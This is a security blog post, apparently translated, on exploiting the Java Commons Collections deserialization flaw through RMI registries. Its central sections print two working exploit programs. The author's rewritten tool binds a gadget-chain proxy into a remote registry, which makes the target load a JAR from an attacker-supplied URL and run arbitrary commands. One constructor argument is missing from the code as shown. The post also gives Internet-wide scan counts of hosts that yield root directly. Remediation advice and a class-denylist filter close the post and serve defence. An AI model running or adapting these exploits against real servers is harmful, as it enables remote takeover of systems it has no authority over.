The Overlooked Mass-Exploitation Vector of the Java Deserialization Vulnerability

The Java deserialization vulnerability that everyone has been talking about hits something fundamental: the way Java is designed for CS (client/server) architectures. Middleware such as JBoss is built on that design. So while I was studying this vulnerability and watching everyone play with it, I became curious whether the large-scale applications that state-owned enterprises build on Java CS architectures (accounting software, content publishing systems and the like) also use the Apache Commons Collections library.

I do not know whether the Java Web experts simply found it boring to look into, but the published analyses of this vulnerability have stopped at exploiting each middleware product and have paid no attention to the fact that ordinary Java Web architectures also fall to this problem. And apart from the Changting article, most of the other write-ups are narrowly targeted, and many are not even accurate.

0x01 The culprit behind large-scale exploitation: RMI

Today many Java web systems are built in a distributed way. In many of the large organizations I know, some Java applications are deployed in the back office purely to publish updated static pages to the external website, and the publishing command travels over RMI.

Let's look at how Wikipedia describes RMI:

Java Remote Method Invocation (Java RMI) is an application programming interface in the Java programming language for implementing remote procedure calls. It allows a program running on a client to invoke objects on a remote server. The remote method invocation feature lets Java programmers distribute operations across a network environment. The whole aim of RMI is to make using remote interface objects as simple as possible.

Java RMI depends heavily on interfaces. When a remote object has to be created, the programmer hides the underlying implementation details by passing an interface. On the client side, a handle to the remote object is connected to a local stub, which takes care of communicating over the network. That way the programmer only has to deal with sending messages through their own interface.

More worrying still: RMI's transport inevitably uses serialization and deserialization, so if an RMI server interface is exposed and the server uses a library like Apache Commons Collections, it is easy prey.

0x02 The key content everyone ignored

Breenmachine's original article describes the impact of the deserialization vulnerability on RMI in many places, for example:

Java loves sending serialized objects all over the place. For example:

In HTTP requests – Parameters, ViewState, Cookies, you name it.

RMI – The extensively used Java RMI protocol is 100% based on serialization

RMI over HTTP – Many Java thick client web apps use this – again 100% serialized objects

JMX – Again, relies on serialized objects being shot over the wire

Custom Protocols – Sending and receiving raw Java objects is the norm – which we'll see in some of the exploits to come

That is, RMI is 100% based on deserialization.

and this:

If you see port 1099, that's Java RMI. RMI by definition just uses serialized objects for all communication. This is trivially vulnerable, as seen in the OpenNMS exploit

If you see port 1099, that is the default port of Java RMI. By default RMI uses serialization for all of its interactions. This is a very common vulnerability, just like the OpenNMS exploit we wrote.

And the section "Exploit 5 – OpenNMS through RMI" introduces exploitation over RMI specifically. Yet everyone has ignored it, which I find hard to understand.

0x03 Exploit construction

Constructing an RMI exploit is fairly easy; anyone who understands Java programming can write one. Here we briefly analyse how the tool implements RMI exploitation.

```java
public class RMIRegistryExploit {
    public static void main(final String[] args) throws Exception {
        // ensure payload does not detonate during construction or deserialization
        ExecBlockingSecurityManager.wrap(new Callable<Void>() {
            public Void call() throws Exception {
                Registry registry = LocateRegistry.getRegistry(args[0], Integer.parseInt(args[1]));
                String className = CommonsCollections1.class.getPackage().getName() + "." + args[2];
                Class<? extends ObjectPayload> payloadClass = (Class<? extends ObjectPayload>) Class.forName(className);
                Object payload = payloadClass.newInstance().getObject(args[3]);
                Remote remote = Gadgets.createMemoitizedProxy(Gadgets.createMap("pwned", payload), Remote.class);
                try {
                    registry.bind("pwned", remote);
                } catch (Throwable e) {
                    e.printStackTrace();
                }
                try {
                    String[] names = registry.list();
                    for (String name : names) {
                        System.out.println("Looking up '" + name + "'");
                        try {
                            Remote rem = registry.lookup(name);
                            System.out.println(Arrays.asList(rem.getClass().getInterfaces()));
                        } catch (Throwable e) {
                            e.printStackTrace();
                        }
                    }
                } catch (Throwable e) {
                    e.printStackTrace();
                }
                return null;
            }
        });
    }
}
```

In this implementation, the constructed attack payload is wrapped in a Java Proxy, and Proxy is used extensively during deserialization. That is the biggest advantage of this payload: it can cope with many different applications. However, the wrapping interferes with getting output back through the exception-message echo, so the tool is not very convenient when you want to see returned results. I therefore rewrote a tool that returns results; the RMI portion of its code is as follows:

```java
public class RMIexploit {
    public static Constructor getFirstCtor(final String name) throws Exception {
        final Constructor ctor = Class.forName(name).getDeclaredConstructors()[0];
        ctor.setAccessible(true);
        return ctor;
    }

    public static void main(String[] args) {
        String ip = args[0];
        int port = Integer.parseInt(args[1]);
        String remoteJar = args[2];
        String command = args[3];
        final String ANN_INV_HANDLER_CLASS = "sun.reflect.annotation.AnnotationInvocationHandler";
        try {
            final Transformer[] transformers = new Transformer[] {
                new ConstantTransformer(/* argument lost in the page as extracted */),
                new InvokerTransformer("getConstructor", new Class[] { Class[].class }, new Object[] { new Class[] { URL[].class } }),
                new InvokerTransformer("newInstance", new Class[] { Object[].class }, new Object[] { new Object[] { new URL[] { new URL(remoteJar) } } }),
                new InvokerTransformer("loadClass", new Class[] { String.class }, new Object[] { "ErrorBaseExec" }),
                new InvokerTransformer("getMethod", new Class[] { String.class, Class[].class }, new Object[] { "do_exec", new Class[] { String.class } }),
                new InvokerTransformer("invoke", new Class[] { Object.class, Object[].class }, new Object[] { null, new String[] { command } })
            };
            Transformer transformedChain = new ChainedTransformer(transformers);
            Map innerMap = new HashMap();
            innerMap.put("value", "value");
            Map outerMap = TransformedMap.decorate(innerMap, null, transformedChain);
            Class cl = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
            Constructor ctor = cl.getDeclaredConstructor(Class.class, Map.class);
            ctor.setAccessible(true);
            Object instance = ctor.newInstance(Target.class, outerMap);
            Registry registry = LocateRegistry.getRegistry(ip, port);

            InvocationHandler h = (InvocationHandler) getFirstCtor(ANN_INV_HANDLER_CLASS).newInstance(Target.class, outerMap);
            Remote r = Remote.class.cast(Proxy.newProxyInstance(Remote.class.getClassLoader(), new Class[] { Remote.class }, h));
            registry.bind("pwned", r);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
```

It is really very simple: after the original payload-generation code, an RMI call is added. I have tested this approach against the JBoss 5 and 6 series, and it gets a shell even where the JMXInvoker has been removed. The scan results presented later show that this exploit is valid not only for JBoss but for the whole RMI protocol.

PS: In my own testing, the JBoss 4 series does not seem to use RMI directly, so the exploit approach given in this section cannot complete the attack against it. As for JBoss 7, it did not appear to open the RMI-related protocol port (perhaps I downloaded it the wrong way, 233), so I had no success there either.

0x04 RMI vulnerability scan

We used our own Internet-wide scanning platform, Seer, to scan every host with port 1090 or 1099 open:

375,4959 hosts have port 1090 or 1099 open; 5,3170 of them are hosts that speak RMI, or 14.16%.

5,875 of those hosts have the deserialization vulnerability, or 11.04%.

Among the vulnerable hosts, 3946 are Linux, of which 2531 (64.14%) can directly yield root privileges; 1929 are Windows, of which 425 (22.03%) can be taken over directly.

0x05 Remediation suggestions

Many vendors had the PoC as early as January this year and still did not fix the problem, so no official patch will be released in the short term. If you take this security issue seriously and want an interim solution, the temporary patch SerialKiller released on GitHub is one option.

After downloading the JAR, put it on the classpath, replace the ObjectInputStream used in the application code with SerialKiller, and then configure which classes are allowed or disabled. SerialKiller supports hot-reloading, whitelisting and blacklisting, which lets you control which types are trusted once external input is deserialized.

The remediation advice above is taken from the Changting Technology article.
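As an added illustration (not code from the original post, nor SerialKiller's own implementation), the allow/deny control described above can be implemented by overriding ObjectInputStream.resolveClass so that each class descriptor is judged by name before the class is loaded; the denylist prefixes, the hypothetical example.Ticket name and the sample objects are constructed for the demo.

```java
import java.io.*;
import java.util.*;

public class FilteringObjectInputStream extends ObjectInputStream {
    // Constructed denylist: the Commons Collections gadget-chain package and the JDK handler it is triggered through.
    private static final String[] DENY_PREFIXES = {
        "org.apache.commons.collections.functors.",
        "org.apache.commons.collections4.functors.",
        "sun.reflect.annotation.AnnotationInvocationHandler"
    };
    // Constructed allowlist: the exact types this application expects on the wire (example.Ticket is hypothetical).
    private static final Set<String> ALLOWED = new HashSet<>(Arrays.asList(
        "java.util.HashMap", "example.Ticket"));

    public FilteringObjectInputStream(InputStream in) throws IOException { super(in); }

    @Override
    protected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {
        String name = desc.getName();
        for (String prefix : DENY_PREFIXES) {
            if (name.startsWith(prefix)) throw new InvalidClassException(name, "blocked by denylist");
        }
        if (!ALLOWED.contains(name)) throw new InvalidClassException(name, "not on allowlist");
        return super.resolveClass(desc);   // only now is the class actually resolved
    }

    // Deserializes untrusted bytes through the filter; a rejected type raises InvalidClassException.
    public static Object readFiltered(byte[] bytes) throws IOException, ClassNotFoundException {
        try (ObjectInputStream in = new FilteringObjectInputStream(new ByteArrayInputStream(bytes))) {
            return in.readObject();
        }
    }

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(bos)) { out.writeObject(o); }
        return bos.toByteArray();
    }

    public static void main(String[] args) throws Exception {
        Map<String, String> ok = new HashMap<>();   // constructed sample: an expected wire type
        ok.put("id", "42");
        System.out.println("accepted: " + readFiltered(serialize(ok)));
        try {
            readFiltered(serialize(new Date()));     // constructed sample: a type not on the allowlist
        } catch (InvalidClassException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

On JDK 8u121 and later the built-in ObjectInputFilter (JEP 290) offers the same allow/deny control, and the sun.rmi.registry.registryFilter system property applies such a filter to registry deserialization.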

Library address:

Green Alliance Technology's Hive has launched its emergency response mechanism for this vulnerability. Hive is an innovative security-scanning plug-in community maintained jointly by many R&D, engineering and service colleagues, committed to building an open and shared security learning community. Security researchers can obtain vulnerability information from the Internet and then write the corresponding scanner according to Hive's development plan, improving their abilities in vulnerability analysis, code development and security communication. Within this community, security staff can also easily obtain the corresponding plug-ins for security testing, jointly maintaining Internet security and witnessing the power of the swarm.

0x06 References

Lib: General exploitation analysis of the Java deserialization vulnerability

Exploiting Deserialization Vulnerabilities in Java

What Do WebLogic, WebSphere, JBoss, Jenkins, OpenNMS, and Your Application Have in Common? This Vulnerability.

AppSecCali 2015 – Marshalling Pickles